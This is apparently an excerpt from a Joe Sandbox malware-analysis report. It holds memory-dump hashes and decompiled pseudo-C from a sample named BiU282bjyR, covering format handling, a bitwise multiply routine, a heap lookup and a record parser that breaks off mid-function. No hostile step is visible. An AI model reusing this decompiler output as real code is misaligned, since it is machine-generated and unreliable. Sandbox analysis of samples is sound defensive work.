                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 1fa31da5269c46967ff0e53a5795a173e166cc0d2c5015a5fdfb7f47583086fa
                    • Instruction ID: 30d0693b55111539422b085644f2e66796524aa720943b510a87a42ab145a8be
                    • Opcode Fuzzy Hash: 1fa31da5269c46967ff0e53a5795a173e166cc0d2c5015a5fdfb7f47583086fa
                    • Instruction Fuzzy Hash: F4D05B3074421C77D51096959D0AEAA779CD701B52F0001A6BB05D72C0DDE15E0487D1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0043DA8C(intOrPtr* __ecx) {
                    				char _v6;
                    				char _v8;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				char _t49;
                    				signed int _t50;
                    				void* _t51;
                    				signed char _t54;
                    				signed char _t56;
                    				signed int _t57;
                    				signed int _t58;
                    				signed char _t67;
                    				signed char _t69;
                    				signed char _t71;
                    				signed char _t80;
                    				signed char _t82;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t87;
                    				signed char _t92;
                    				void* _t95;
                    				intOrPtr _t100;
                    				unsigned int _t102;
                    				signed char _t104;
                    				void* _t112;
                    				unsigned int _t113;
                    				void* _t114;
                    				signed int _t115;
                    				signed int* _t116;
                    				intOrPtr* _t119;
                    				void* _t121;
                    				void* _t122;
                    				void* _t124;
                    				void* _t125;
                    
                    				_push(__ecx);
                    				_t119 = __ecx;
                    				_t92 = 1;
                    				_t49 =  *((char*)(__ecx + 0x31));
                    				_t124 = _t49 - 0x64;
                    				if(_t124 > 0) {
                    					__eflags = _t49 - 0x70;
                    					if(__eflags > 0) {
                    						_t50 = _t49 - 0x73;
                    						__eflags = _t50;
                    						if(_t50 == 0) {
                    							L9:
                    							_t51 = E0043E8D7(_t119);
                    							L10:
                    							if(_t51 != 0) {
                    								__eflags =  *((char*)(_t119 + 0x30));
                    								if( *((char*)(_t119 + 0x30)) == 0) {
                    									_t113 =  *(_t119 + 0x20);
                    									_push(_t114);
                    									_v8 = 0;
                    									_t115 = 0;
                    									_v6 = 0;
                    									_t54 = _t113 >> 4;
                    									__eflags = _t92 & _t54;
                    									if((_t92 & _t54) == 0) {
                    										L46:
                    										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                    										__eflags = _t100 - 0x78;
                    										if(_t100 == 0x78) {
                    											L48:
                    											_t56 = _t113 >> 5;
                    											__eflags = _t92 & _t56;
                    											if((_t92 & _t56) != 0) {
                    												L50:
                    												__eflags = _t100 - 0x61;
                    												if(_t100 == 0x61) {
                    													L53:
                    													_t57 = 1;
                    													L54:
                    													__eflags = _t92;
                    													if(_t92 != 0) {
                    														L56:
                    														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                    														__eflags = _t100 - 0x58;
                    														if(_t100 == 0x58) {
                    															L59:
                    															_t58 = 1;
                    															L60:
                    															__eflags = _t58;
                    															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                    															_t115 = _t115 + 2;
                    															__eflags = _t115;
                    															L61:
                    															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                    															__eflags = _t113 & 0x0000000c;
                    															if((_t113 & 0x0000000c) == 0) {
                    																E0043C4CE(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                    																_t122 = _t122 + 0x10;
                    															}
                    															E0043EF5D(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                    															_t102 =  *(_t119 + 0x20);
                    															_t116 = _t119 + 0x18;
                    															_t67 = _t102 >> 3;
                    															__eflags = _t67 & 0x00000001;
                    															if((_t67 & 0x00000001) != 0) {
                    																_t104 = _t102 >> 2;
                    																__eflags = _t104 & 0x00000001;
                    																if((_t104 & 0x00000001) == 0) {
                    																	E0043C4CE(_t119 + 0x448, 0x30, _t95, _t116);
                    																	_t122 = _t122 + 0x10;
                    																}
                    															}
                    															E0043EC89(_t95, _t119, _t116, _t119, 0);
                    															__eflags =  *_t116;
                    															if( *_t116 >= 0) {
                    																_t71 =  *(_t119 + 0x20) >> 2;
                    																__eflags = _t71 & 0x00000001;
                    																if((_t71 & 0x00000001) != 0) {
                    																	E0043C4CE(_t119 + 0x448, 0x20, _t95, _t116);
                    																}
                    															}
                    															_t69 = 1;
                    															L70:
                    															return _t69;
                    														}
                    														__eflags = _t100 - 0x41;
                    														if(_t100 == 0x41) {
                    															goto L59;
                    														}
                    														_t58 = 0;
                    														goto L60;
                    													}
                    													__eflags = _t57;
                    													if(_t57 == 0) {
                    														goto L61;
                    													}
                    													goto L56;
                    												}
                    												__eflags = _t100 - 0x41;
                    												if(_t100 == 0x41) {
                    													goto L53;
                    												}
                    												_t57 = 0;
                    												goto L54;
                    											}
                    											L49:
                    											_t92 = 0;
                    											__eflags = 0;
                    											goto L50;
                    										}
                    										__eflags = _t100 - 0x58;
                    										if(_t100 != 0x58) {
                    											goto L49;
                    										}
                    										goto L48;
                    									}
                    									_t80 = _t113 >> 6;
                    									__eflags = _t92 & _t80;
                    									if((_t92 & _t80) == 0) {
                    										__eflags = _t92 & _t113;
                    										if((_t92 & _t113) == 0) {
                    											_t82 = _t113 >> 1;
                    											__eflags = _t92 & _t82;
                    											if((_t92 & _t82) == 0) {
                    												goto L46;
                    											}
                    											_v8 = 0x20;
                    											L45:
                    											_t115 = _t92;
                    											goto L46;
                    										}
                    										_v8 = 0x2b;
                    										goto L45;
                    									}
                    									_v8 = 0x2d;
                    									goto L45;
                    								}
                    								_t69 = _t92;
                    								goto L70;
                    							}
                    							L11:
                    							_t69 = 0;
                    							goto L70;
                    						}
                    						_t84 = _t50;
                    						__eflags = _t84;
                    						if(__eflags == 0) {
                    							L28:
                    							_push(0);
                    							_push(0xa);
                    							L29:
                    							_t51 = E0043E6E2(_t119, _t114, __eflags);
                    							goto L10;
                    						}
                    						__eflags = _t84 - 3;
                    						if(__eflags != 0) {
                    							goto L11;
                    						}
                    						_push(0);
                    						L13:
                    						_push(0x10);
                    						goto L29;
                    					}
                    					if(__eflags == 0) {
                    						_t51 = E0043E8BF(__ecx);
                    						goto L10;
                    					}
                    					__eflags = _t49 - 0x67;
                    					if(_t49 <= 0x67) {
                    						L30:
                    						_t51 = E0043E2EE(_t92, _t119, _t112);
                    						goto L10;
                    					}
                    					__eflags = _t49 - 0x69;
                    					if(_t49 == 0x69) {
                    						L27:
                    						_t2 = _t119 + 0x20;
                    						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                    						__eflags =  *_t2;
                    						goto L28;
                    					}
                    					__eflags = _t49 - 0x6e;
                    					if(_t49 == 0x6e) {
                    						_t51 = E0043E82C(__ecx, _t112);
                    						goto L10;
                    					}
                    					__eflags = _t49 - 0x6f;
                    					if(_t49 != 0x6f) {
                    						goto L11;
                    					}
                    					_t51 = E0043E8A0(__ecx);
                    					goto L10;
                    				}
                    				if(_t124 == 0) {
                    					goto L27;
                    				}
                    				_t125 = _t49 - 0x58;
                    				if(_t125 > 0) {
                    					_t86 = _t49 - 0x5a;
                    					__eflags = _t86;
                    					if(_t86 == 0) {
                    						_t51 = E0043E228(__ecx);
                    						goto L10;
                    					}
                    					_t87 = _t86 - 7;
                    					__eflags = _t87;
                    					if(_t87 == 0) {
                    						goto L30;
                    					}
                    					__eflags = _t87;
                    					if(__eflags != 0) {
                    						goto L11;
                    					}
                    					L17:
                    					_t51 = E0043E5BA(_t92, _t119, __eflags, 0);
                    					goto L10;
                    				}
                    				if(_t125 == 0) {
                    					_push(1);
                    					goto L13;
                    				}
                    				if(_t49 == 0x41) {
                    					goto L30;
                    				}
                    				if(_t49 == 0x43) {
                    					goto L17;
                    				}
                    				if(_t49 <= 0x44) {
                    					goto L11;
                    				}
                    				if(_t49 <= 0x47) {
                    					goto L30;
                    				}
                    				if(_t49 != 0x53) {
                    					goto L11;
                    				}
                    				goto L9;
                    			}






































                    0x0043da91
                    0x0043da94
                    0x0043da98
                    0x0043da9b
                    0x0043da9f
                    0x0043daa2
                    0x0043db10
                    0x0043db13
                    0x0043db62
                    0x0043db62
                    0x0043db65
                    0x0043dad2
                    0x0043dad4
                    0x0043dad9
                    0x0043dadb
                    0x0043db80
                    0x0043db84
                    0x0043db8d
                    0x0043db92
                    0x0043db93
                    0x0043db97
                    0x0043db99
                    0x0043db9e
                    0x0043dba1
                    0x0043dba3
                    0x0043dbcc
                    0x0043dbcc
                    0x0043dbcf
                    0x0043dbd2
                    0x0043dbd9
                    0x0043dbdb
                    0x0043dbde
                    0x0043dbe0
                    0x0043dbe4
                    0x0043dbe4
                    0x0043dbe7
                    0x0043dbf2
                    0x0043dbf2
                    0x0043dbf4
                    0x0043dbf4
                    0x0043dbf6
                    0x0043dbfc
                    0x0043dbfc
                    0x0043dc01
                    0x0043dc04
                    0x0043dc0f
                    0x0043dc0f
                    0x0043dc11
                    0x0043dc11
                    0x0043dc1c
                    0x0043dc20
                    0x0043dc20
                    0x0043dc23
                    0x0043dc29
                    0x0043dc2b
                    0x0043dc2e
                    0x0043dc3e
                    0x0043dc43
                    0x0043dc43
                    0x0043dc58
                    0x0043dc5d
                    0x0043dc60
                    0x0043dc65
                    0x0043dc68
                    0x0043dc6a
                    0x0043dc6c
                    0x0043dc6f
                    0x0043dc72
                    0x0043dc7f
                    0x0043dc84
                    0x0043dc84
                    0x0043dc72
                    0x0043dc8b
                    0x0043dc90
                    0x0043dc93
                    0x0043dc98
                    0x0043dc9b
                    0x0043dc9d
                    0x0043dcaa
                    0x0043dcaf
                    0x0043dc9d
                    0x0043dcb2
                    0x0043dcb5
                    0x0043dcba
                    0x0043dcba
                    0x0043dc06
                    0x0043dc09
                    0x00000000
                    0x00000000
                    0x0043dc0b
                    0x00000000
                    0x0043dc0b
                    0x0043dbf8
                    0x0043dbfa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043dbfa
                    0x0043dbe9
                    0x0043dbec
                    0x00000000
                    0x00000000
                    0x0043dbee
                    0x00000000
                    0x0043dbee
                    0x0043dbe2
                    0x0043dbe2
                    0x0043dbe2
                    0x00000000
                    0x0043dbe2
                    0x0043dbd4
                    0x0043dbd7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043dbd7
                    0x0043dba7
                    0x0043dbaa
                    0x0043dbac
                    0x0043dbb4
                    0x0043dbb6
                    0x0043dbc0
                    0x0043dbc2
                    0x0043dbc4
                    0x00000000
                    0x00000000
                    0x0043dbc6
                    0x0043dbca
                    0x0043dbca
                    0x00000000
                    0x0043dbca
                    0x0043dbb8
                    0x00000000
                    0x0043dbb8
                    0x0043dbae
                    0x00000000
                    0x0043dbae
                    0x0043db86
                    0x00000000
                    0x0043db86
                    0x0043dae1
                    0x0043dae1
                    0x00000000
                    0x0043dae1
                    0x0043db6c
                    0x0043db6c
                    0x0043db6f
                    0x0043db41
                    0x0043db41
                    0x0043db42
                    0x0043db44
                    0x0043db46
                    0x00000000
                    0x0043db46
                    0x0043db71
                    0x0043db74
                    0x00000000
                    0x00000000
                    0x0043db7a
                    0x0043dae9
                    0x0043dae9
                    0x00000000
                    0x0043dae9
                    0x0043db15
                    0x0043db58
                    0x00000000
                    0x0043db58
                    0x0043db17
                    0x0043db1a
                    0x0043db4d
                    0x0043db4f
                    0x00000000
                    0x0043db4f
                    0x0043db1c
                    0x0043db1f
                    0x0043db3d
                    0x0043db3d
                    0x0043db3d
                    0x0043db3d
                    0x00000000
                    0x0043db3d
                    0x0043db21
                    0x0043db24
                    0x0043db36
                    0x00000000
                    0x0043db36
                    0x0043db26
                    0x0043db29
                    0x00000000
                    0x00000000
                    0x0043db2d
                    0x00000000
                    0x0043db2d
                    0x0043daa4
                    0x00000000
                    0x00000000
                    0x0043daaa
                    0x0043daad
                    0x0043daed
                    0x0043daed
                    0x0043daf0
                    0x0043db09
                    0x00000000
                    0x0043db09
                    0x0043daf2
                    0x0043daf2
                    0x0043daf5
                    0x00000000
                    0x00000000
                    0x0043daf8
                    0x0043dafb
                    0x00000000
                    0x00000000
                    0x0043dafd
                    0x0043db00
                    0x00000000
                    0x0043db00
                    0x0043daaf
                    0x0043dae8
                    0x00000000
                    0x0043dae8
                    0x0043dab4
                    0x00000000
                    0x00000000
                    0x0043dabd
                    0x00000000
                    0x00000000
                    0x0043dac2
                    0x00000000
                    0x00000000
                    0x0043dac7
                    0x00000000
                    0x00000000
                    0x0043dad0
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 46d61dbfab491d97ef9876c6ef4cb8ef64504c2250b219ca031d6b984d514b91
                    • Instruction ID: 45c3b05ead3b7b7d6661eb42b4e20b9c84694eeeb5b2b5fdc039346c0cbd199b
                    • Opcode Fuzzy Hash: 46d61dbfab491d97ef9876c6ef4cb8ef64504c2250b219ca031d6b984d514b91
                    • Instruction Fuzzy Hash: 52519860E0860497DF389A6966657BFA3999B1D304F18391FE883C73C2C24CEE02D35E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E00427464(signed int* __ecx, intOrPtr __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int* _v24;
                    				signed int _v28;
                    				char _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _t76;
                    				signed int _t77;
                    				signed int _t81;
                    				signed int _t85;
                    				signed int _t88;
                    				signed int _t92;
                    				unsigned int _t93;
                    				signed int _t98;
                    				signed int* _t99;
                    				signed int _t101;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t109;
                    				signed int _t115;
                    				signed int _t116;
                    				signed int _t118;
                    				signed int _t120;
                    				signed int _t124;
                    
                    				_t93 = __ecx[1];
                    				asm("xorps xmm0, xmm0");
                    				_t120 =  *__ecx;
                    				_t76 = 0;
                    				_t115 = __ecx[2];
                    				asm("movlpd [esp+0x40], xmm0");
                    				asm("movlpd [esp+0x38], xmm0");
                    				_v48 = _v12;
                    				_v40 = __edx;
                    				_t101 = __ecx[3];
                    				_v24 = __ecx;
                    				_v52 = _v16;
                    				_v28 = 0;
                    				_v44 = _v8;
                    				_v56 = _v20;
                    				do {
                    					_v32 = 0x40;
                    					_t109 =  *(_v40 + _t76 * 8);
                    					_t77 =  *(_v40 + 4 + _t76 * 8);
                    					_t98 = _v44;
                    					_v36 = _t77;
                    					do {
                    						_t124 = _t77;
                    						if(_t124 <= 0 && (_t124 < 0 || _t109 < 0)) {
                    							_v56 = _v56 ^ _t120;
                    							_v52 = _v52 ^ _t93;
                    							_v48 = _v48 ^ _t115;
                    							_t98 = _t98 ^ _t101;
                    						}
                    						_t81 = _t120;
                    						if((_t115 & 0x00000001) == 0) {
                    							_t116 = (_t101 << 0x00000020 | _t115) >> 1;
                    							_t102 = _t101 >> 1;
                    							if((_t81 & 0x00000001) == 0) {
                    								asm("xorps xmm0, xmm0");
                    								asm("movlpd [esp+0x38], xmm0");
                    								_v44 = _v16;
                    								_t85 = _v20;
                    							} else {
                    								_t85 = 0;
                    								_v44 = 0x80000000;
                    							}
                    							_t101 = _t102 | _v44;
                    							_t115 = _t116 | _t85;
                    							_t120 = (_t93 << 0x00000020 | _t120) >> 1;
                    							_t93 = _t93 >> 1;
                    						} else {
                    							_t118 = (_t101 << 0x00000020 | _t115) >> 1;
                    							_t103 = _t101 >> 1;
                    							if((_t81 & 0x00000001) == 0) {
                    								asm("xorps xmm0, xmm0");
                    								asm("movlpd [esp+0x38], xmm0");
                    								_v44 = _v16;
                    								_t92 = _v20;
                    							} else {
                    								_t92 = 0;
                    								_v44 = 0x80000000;
                    							}
                    							_t101 = _t103 | _v44;
                    							_t115 = _t118 | _t92;
                    							_t120 = (_t93 << 0x00000020 | _t120) >> 0x1 ^ 0x00000000;
                    							_t93 = _t93 >> 0x00000001 ^ 0xe1000000;
                    						}
                    						_t77 = (_v36 << 0x00000020 | _t109) << 1;
                    						_t109 = _t109 + _t109;
                    						_v36 = _t77;
                    						_t63 =  &_v32;
                    						 *_t63 = _v32 - 1;
                    					} while ( *_t63 != 0);
                    					_t76 = _v28 + 1;
                    					_v44 = _t98;
                    					_v28 = _t76;
                    				} while (_t76 < 2);
                    				_t99 = _v24;
                    				_t88 = _v44;
                    				 *_t99 = _v56;
                    				_t99[1] = _v52;
                    				_t99[2] = _v48;
                    				_t99[3] = _t88;
                    				return _t88;
                    			}


































                    0x00427468
                    0x0042746b
                    0x0042746f
                    0x00427471
                    0x00427474
                    0x00427478
                    0x00427482
                    0x00427488
                    0x00427490
                    0x00427494
                    0x00427497
                    0x0042749f
                    0x004274a7
                    0x004274ab
                    0x004274af
                    0x004274b3
                    0x004274bb
                    0x004274c3
                    0x004274c6
                    0x004274ca
                    0x004274ce
                    0x004274d2
                    0x004274d2
                    0x004274d4
                    0x004274dc
                    0x004274e0
                    0x004274e4
                    0x004274e8
                    0x004274e8
                    0x004274f2
                    0x004274f4
                    0x0042753c
                    0x00427543
                    0x00427548
                    0x00427556
                    0x00427559
                    0x00427563
                    0x00427567
                    0x0042754a
                    0x0042754a
                    0x0042754c
                    0x0042754c
                    0x0042756b
                    0x0042756f
                    0x00427571
                    0x00427575
                    0x004274f6
                    0x004274f6
                    0x004274fd
                    0x00427502
                    0x00427510
                    0x00427513
                    0x0042751d
                    0x00427521
                    0x00427504
                    0x00427504
                    0x00427506
                    0x00427506
                    0x00427525
                    0x00427529
                    0x00427531
                    0x00427534
                    0x00427534
                    0x0042757b
                    0x0042757f
                    0x00427581
                    0x00427585
                    0x00427585
                    0x00427585
                    0x00427594
                    0x00427595
                    0x00427599
                    0x0042759d
                    0x004275a6
                    0x004275ae
                    0x004275b2
                    0x004275b8
                    0x004275bf
                    0x004275c5
                    0x004275cc

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                    • Instruction ID: c806f6ad0ebdffa24dc7175d66293d15e87ed45fbab216c919e6e1373f3f3ca7
                    • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                    • Instruction Fuzzy Hash: 52410875A087459BC340CF29D58061BFBE1FFD8314F645A1EF889A3350D379E9828B86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044F55D() {
                    				signed int _t3;
                    
                    				_t3 = GetProcessHeap();
                    				 *0x471a5c = _t3;
                    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                    			}




                    0x0044f55d
                    0x0044f565
                    0x0044f56d

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 867ad778fa34e84f27ba2013377f146232b4805948e265af83637f0babca62a2
                    • Instruction ID: 30f022ad0cce74eaba37be86ab22e722a7301547fa6f372751316b1e43f194a3
                    • Opcode Fuzzy Hash: 867ad778fa34e84f27ba2013377f146232b4805948e265af83637f0babca62a2
                    • Instruction Fuzzy Hash: 27A01230111200CB43004F365904209369C6600591301C0389006D0174DE2080404F14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2465cecd3fa17ff27ea482fa5ea89fd073e7c1040bc202574ceeb29c05723bc4
                    • Instruction ID: e8383f9edfbf863fd93451b0834012ed2f3ed1cd3379f95158f962c32f870810
                    • Opcode Fuzzy Hash: 2465cecd3fa17ff27ea482fa5ea89fd073e7c1040bc202574ceeb29c05723bc4
                    • Instruction Fuzzy Hash: 4A324721D29F414DE7279A35CC22336A248AFB73C9F15D737F826B5AA6FB28D5834104
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0041EB18(intOrPtr* __ecx, intOrPtr __edx) {
                    				void* __edi;
                    				signed int _t260;
                    				intOrPtr _t262;
                    				intOrPtr _t275;
                    				signed int _t277;
                    				signed char _t282;
                    				void* _t284;
                    				void* _t290;
                    				void* _t293;
                    				intOrPtr _t297;
                    				void* _t322;
                    				signed char _t324;
                    				void* _t339;
                    				void* _t350;
                    				void* _t362;
                    				signed char _t370;
                    				signed int _t371;
                    				intOrPtr _t374;
                    				void* _t375;
                    				void* _t376;
                    				void* _t377;
                    				void* _t378;
                    				intOrPtr _t380;
                    				signed int _t381;
                    				intOrPtr _t382;
                    				signed short _t385;
                    				intOrPtr* _t386;
                    				intOrPtr _t387;
                    				intOrPtr _t388;
                    				intOrPtr _t390;
                    				intOrPtr _t393;
                    				signed int _t398;
                    				signed int _t404;
                    				intOrPtr* _t407;
                    				signed short _t430;
                    				signed int _t445;
                    				signed int _t448;
                    				intOrPtr _t454;
                    				signed int _t458;
                    				signed char _t459;
                    				intOrPtr _t462;
                    				void* _t469;
                    				void* _t478;
                    				intOrPtr* _t490;
                    				signed int _t491;
                    				signed int _t493;
                    				signed int _t494;
                    				intOrPtr _t495;
                    				signed int _t496;
                    				signed int _t497;
                    				signed int _t498;
                    				void* _t500;
                    				void* _t501;
                    				void* _t508;
                    
                    				 *((intOrPtr*)(_t500 + 0x1c)) = __edx;
                    				_t490 = __ecx;
                    				 *((intOrPtr*)(_t500 + 0x2c)) = 0;
                    				 *((intOrPtr*)(_t500 + 0x28)) = 0;
                    				_t491 = 0;
                    				 *((char*)(__ecx + 0x320)) = 0;
                    				E004368A0(__ecx, _t500 + 0x38, 0, 0x28);
                    				_t494 =  *(_t500 + 0x6c);
                    				_t501 = _t500 + 0xc;
                    				 *(_t501 + 0x28) = 0xfffb;
                    				_t393 =  *_t494;
                    				_t380 = _t393;
                    				 *((intOrPtr*)(_t501 + 0x3c)) = _t393;
                    				 *((intOrPtr*)(_t501 + 0x40)) = _t380;
                    				_t458 = 1;
                    				_t260 =  *(_t490 + 0x320) & 0x000000ff;
                    				if(_t260 == 0) {
                    					_t459 =  *(_t490 + 0x310) & 0x0000ffff;
                    					_t495 =  *((intOrPtr*)(_t501 + 0x64));
                    					if(_t459 < 0x8000) {
                    						L17:
                    						_push(0x48);
                    						_t262 = E004328E2();
                    						 *((intOrPtr*)(_t501 + 0x30)) = _t262;
                    						if(_t262 == 0) {
                    							L16:
                    							_t491 = 0xffffff83;
                    							L133:
                    							E0041E9B9(_t501 + 0x30);
                    							E0041DDE4(_t490);
                    							return _t491;
                    						}
                    						E004368A0(_t490, _t262, 0, 0x48);
                    						_t381 =  *(_t501 + 0x48);
                    						_t501 = _t501 + 0xc;
                    						if(_t381 -  *((intOrPtr*)(_t501 + 0x40)) + 3 > _t495) {
                    							L10:
                    							_t491 = 0xfffffeb8;
                    							goto L133;
                    						}
                    						E0041D0C5(_t381 +  *((intOrPtr*)(_t501 + 0x1c)), _t501 + 0x24);
                    						_t398 =  *(_t501 + 0x24);
                    						_t382 = _t381 + 3;
                    						 *((intOrPtr*)(_t501 + 0x3c)) = _t382;
                    						 *(_t501 + 0x18) = _t398;
                    						if(_t398 > 0x481e) {
                    							goto L10;
                    						}
                    						_t462 =  *((intOrPtr*)(_t501 + 0x40));
                    						if(_t398 - _t462 + _t382 != _t495) {
                    							goto L10;
                    						}
                    						_t496 =  *(_t501 + 0x44);
                    						if(_t398 == 0) {
                    							L34:
                    							 *(_t501 + 0x4c) =  *(_t501 + 0x4c) & 0x00000000;
                    							 *(_t501 + 0x48) = _t496;
                    							if(_t496 != 0) {
                    								L40:
                    								 *(_t501 + 0x56) =  *(_t501 + 0x56) &  *(_t501 + 0x28);
                    								_t393 = 0x370;
                    								_t275 = E004328E2();
                    								 *((intOrPtr*)(_t501 + 0x38)) = _t275;
                    								if(_t275 == 0) {
                    									goto L16;
                    								} else {
                    									E004368A0(_t490, _t275, 0, 0x370);
                    									_t501 = _t501 + 0xc;
                    									_t458 = 1;
                    									 *(_t490 + 0x320) = 1;
                    									L42:
                    									_t277 =  *(_t501 + 0x48);
                    									if(_t277 <= 0) {
                    										L63:
                    										if(_t491 != 0) {
                    											goto L133;
                    										}
                    										_t494 =  *(_t501 + 0x60);
                    										 *(_t490 + 0x320) = 2;
                    										L65:
                    										_t385 = 1;
                    										if( *(_t501 + 0x48) <= 0) {
                    											L70:
                    											if(( *(_t501 + 0x56) & _t385) == 0 || _t491 == 0) {
                    												 *(_t490 + 0x320) = 3;
                    												L73:
                    												if( *(_t501 + 0x48) <= 0) {
                    													L114:
                    													if(( *(_t501 + 0x56) & 1) == 0 || _t491 == 0) {
                    														 *(_t490 + 0x320) = 4;
                    														L117:
                    														if( *(_t501 + 0x50) != 0) {
                    															_t491 =  ==  ?  *(_t501 + 0x50) : _t491;
                    														}
                    														_push(_t501 + 0x30);
                    														_push(_t491);
                    														_t491 = E0041E857( *((intOrPtr*)( *_t490 + 0x50)), _t490);
                    														_t282 =  *(_t490 + 0x310) & 0x0000ffff;
                    														_t404 = _t282 & 0x00000080;
                    														if(_t404 != 0 && (_t491 == 0xfffffe96 || _t491 == 0xfffffe97)) {
                    															 *(_t490 + 0x1f8) =  *(_t490 + 0x1f8) & 0x00000000;
                    															_t491 = 0;
                    														}
                    														if(_t491 == 0) {
                    															if((_t282 & 0x00000030) == 0x10) {
                    																 *((char*)(_t490 + 0x319)) = 5;
                    															}
                    														} else {
                    															if(_t404 == 0) {
                    																E0041E7F8(_t490, _t491);
                    															}
                    															 *(_t490 + 0x1f8) = _t491;
                    														}
                    														_t284 = E0041D13E(_t490);
                    														_t393 =  *((intOrPtr*)(_t501 + 0x3c));
                    														if(_t284 != 0) {
                    															_t393 = _t393 +  *((intOrPtr*)(_t490 + 0x308));
                    															 *((intOrPtr*)(_t501 + 0x3c)) = _t393;
                    														}
                    														 *(_t490 + 0x320) = 5;
                    														L132:
                    														 *_t494 = _t393;
                    													}
                    													goto L133;
                    												}
                    												_t407 =  *((intOrPtr*)(_t501 + 0x38));
                    												if( *((intOrPtr*)(_t407 + 0x36c)) >= 0x80) {
                    													if( *((intOrPtr*)(_t490 + 0x22f)) == _t385 && ( *(_t490 + 0x310) & 0x00000030) == 0x10) {
                    														_t491 =  ==  ? 0xfffffe7f : _t491;
                    													}
                    													_t297 =  *((intOrPtr*)(_t490 + 0x230));
                    													if(_t297 == _t385 || _t297 == 3 &&  *((char*)(_t490 + 0x233)) == 0) {
                    														_t491 =  ==  ? 0xfffffe81 : _t491;
                    													}
                    												}
                    												if(( *(_t407 + 0x36d) & _t385) != 0) {
                    													if(( *(_t490 + 0x310) & 0x00000030) != 0x10) {
                    														_t491 =  ==  ? 0xfffffe7e : _t491;
                    													} else {
                    														if(( *(_t407 + 0x31c) & 0x00000003) == 0) {
                    															_t491 = 0xfffffe7e;
                    														}
                    													}
                    												}
                    												if(( *(_t501 + 0x56) & _t385) == 0) {
                    													 *(_t490 + 0x312) =  *(_t490 + 0x312) | 0x00002000;
                    													if(( *(_t490 + 0x310) & 0x00000080) == 0) {
                    														_t291 =  *((intOrPtr*)(_t490 + 0x100));
                    														if( *((intOrPtr*)(_t490 + 0x100)) != 0) {
                    															if( *((intOrPtr*)(_t407 + 0x24)) == 0) {
